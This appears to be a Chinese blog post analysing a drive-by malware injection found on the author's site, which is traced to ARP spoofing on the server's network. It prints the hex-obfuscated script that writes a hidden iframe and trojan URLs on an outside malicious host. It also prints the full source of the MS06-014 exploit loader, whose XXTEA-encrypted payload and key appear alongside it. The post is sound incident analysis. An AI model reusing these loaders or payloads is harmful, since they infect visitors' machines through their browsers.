16进制的转换之javascript运行时会自动转码

当前位置 : 首页 > 实用技巧 > 网络安全 > 16进制的转换之javascript运行时会自动转码

16进制的转换之javascript运行时会自动转码

来源:互联网 作者:脚本宝典 时间:2015-07-26 17:46
此时检查网页源代码可发现网页顶部被加入了一句scriptsrc=http://1.520sb.cn/1.js/script 但这句代码不常出现 原以为服务器被人攻击了或者是服务器中病毒了 检查过所有出现过问题的页面及相

此时检查网页源代码可发现网页顶部被加入了一句<script src=http://1.520sb.cn/1.js></script> 
但这句代码不常出现 
原以为服务器被人攻击了或者是服务器中病毒了 
检查过所有出现过问题的页面及相关文件 
没有发现异常 
服务器也没有找到入侵痕迹 

把这个js文件下载到本地,打开后发现是如下代码 
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x6d\x61\/\x31\x2e\x6a\x70\x67\'\x29\"\x3e"); 
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x6d\x61\/\x32\x2e\x6a\x70\x67\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e"); 
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

16进制的转换,由于javascript运行时会自动转码,这段代码被嵌入后打开网页即自动运行。 
我们使用document.write语句,把这段代码打印到页面上,转换后代码为 
window["document"]["writeln"]("<DIV style="CURSOR: url('http://1.520sb.cn/ma/1.jpg')">");window["document"]["writeln"]("<DIV style="CURSOR: url('http://1.520sb.cn/ma/2.jpg')"></DIV></DIV>");window["document"]["writeln"]("<iframe src=http://1.520sb.cn/tj.htm width=0 height=0></iframe>") 

http://1.520sb.cn/ma/1.jpg 和 http://1.520sb.cn/ma/2.jpg是两个木马文件,具体未查,http://1.520sb.cn/tj.htm包含统计和一个MS06014漏洞的利用脚本http://1.520sb.cn/mm/06014.htm 

http://1.520sb.cn/mm/06014.htm的内容为 
<script language =javascript> 
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4) 
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}} 
return out.join('');} 
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1); 
function base64decode(str) 
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len) 
{do 
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1) 
break;do 
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1) 
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do 
{c3=str.charCodeAt(i++)&0xff;if(c3==61) 
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1) 
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do 
{c4=str.charCodeAt(i++)&0xff;if(c4==61) 
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1) 
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)} 
return out} 
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++) 
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);} 
if(w){return v.join('').substring(0,sl);} 
else{return v.join('');}} 
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4) 
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;} 
if(w){v[v.length]=len;} 
return v;} 
function xxtea_decrypt(str,key){if(str==""){return"";} 
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;} 
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;} 
return long2str(v,true);} 
t="WxVGrqSVCFufJ2Q0UfFATtOcAf7JQXBkZV5bKcf0Dq/Y74mVvPn26A0t/IvHny4Yh4RYYIac/VDS3fyve81yHK1BjvX1Apl4NHpl/rnNED15lBZ+yMHdIxfcQnLw5Tl5fe/bM63GEdjh7hK3lks0phVie1B12g3fdnKwC2+mgNUlhUXA4+iyLe+NS68c7H4YNAYz++0kv/Pj5JtzWlqB9VuRmblzgTr1kVs6LwzBz5T7LqIWEMc75crmEnBaon4kCBNpiOI78chxVuqUICBOSDBJ5kCblDNsUh6XSUZsGJFbEfwEmaP4IpqYh/9XhLZ7r18whNFb2sDry116kkZOWlWv9jaqRx5MEgPDqtXgBWKR9MCDmZWxdeJ+VYhbnt9c/wnRAh7gq/1FfvbaSmWIMYTEb0cJ7BA9UQCCVguxB9xRrKjmd/qx6JgmUhashgxcR3T9jLk+TDLolNuvGw8DFNnv0orM403xi52oRsTdOTKj+h+jxUjWc8GlZ5Nsy4av4fokSt567oAB45KsK9FcrWgKV3vOhIsdrSSfAIVeUgj+4MGz5k9jdLHVMXaitumnbE5PZXiapExEtz0pliqK80XFipcB5Qy/CdHSEhb5L0Ctl2JDsavLC9ve02HDIAi7ISAaHlBgMTBH2s7tnHQh/IFHZPF898HpKBDM5Nf2sIuuirYTDlXb7KzhJruYRWU+ew715RyhSCqQheW9JZtCXSh25mpbQKw/2qbusz6diL36lJcLy8L/aro7aQyiSFeOa8H/0+85ZAC5o2Pw6DBwYSNrJdcOAMNLcTwJncVKbAOl7B7kwkWASCW3l+17fOGiKU9L+qs1Z1bmbDzqDSK98FNwOvI/lQ9jkEW8tP6BQZZy6un+4ozgxANpQUyZrq2CqAJXRXLxZabDj9Bq1N/2EdVKjYfgsRfqWaFe4owXS7a11WeBE9KuR3/P5lp3G/e4oPt0qVjUT+NlF3rCuf9eEw+3L/OpR8KVZboUOkV5bhWxiWLkf/HhhK3YeGMPaO6uJlFkmLroHoZnYAi1/oDNGziqc61FE2m/kbdOWUwX8tNmh16wb5Uf3g2NZ3M6Ma13kjEqus9hThzGrImK5YsXHS5e0Ludet04HStXz81rVHkivtiT"; 
t=utf8to16(xxtea_decrypt(base64decode(t), 'fuckjapan')); 
document.write (t); 
</script> 

记录待查。 
由于没有查到服务器设置被更改及入侵的迹象,上网搜索了一下520sb,看到有人说到:和你们说的都无关 这是arpsniffer的一种,数据包在送出到达网关的过程中被劫持 主要原因是内网有计算机被控制,通过arp欺骗手段在某些关键字里加的。即使是简单的html页面也会被加入。因为arp技术的不稳定性,所以劫持的成功率不一样。 
呵呵。客户有次遇到过,最后原因就是这个,重装系统都没用,找出那个计算机是关键 
http://www.im286.com/archiver/tid-1886972.html 
http://linux.chinaunix.net/bbs/thread-886420-4-1.html 
那么就是说是服务器局域网的问题 

想起万网有提供一个软件绑定网关ip和mac地址用来防止arp欺骗的小软件,连忙下载后运行,提示绑定成功, 
刷新网站,但是发现插入的病毒代码依然存在。 

打电话到万网,得到确实是arp欺骗的肯定回答,答检查有问题的主机需要到下周一,提示我下载他们的mac绑定工具,就是我原来运行的那个小软件,让我重启后再观察。 

目前为止,问题貌似已解决,记录以上待查。 

由于本blog放在同一服务器上,请这周浏览过本博滴朋友及时升级杀毒软件,并做好杀毒工作,如因此造成了任何损失,本人只能深深的致以歉意。 


Tag:

相关文章

网友评论

<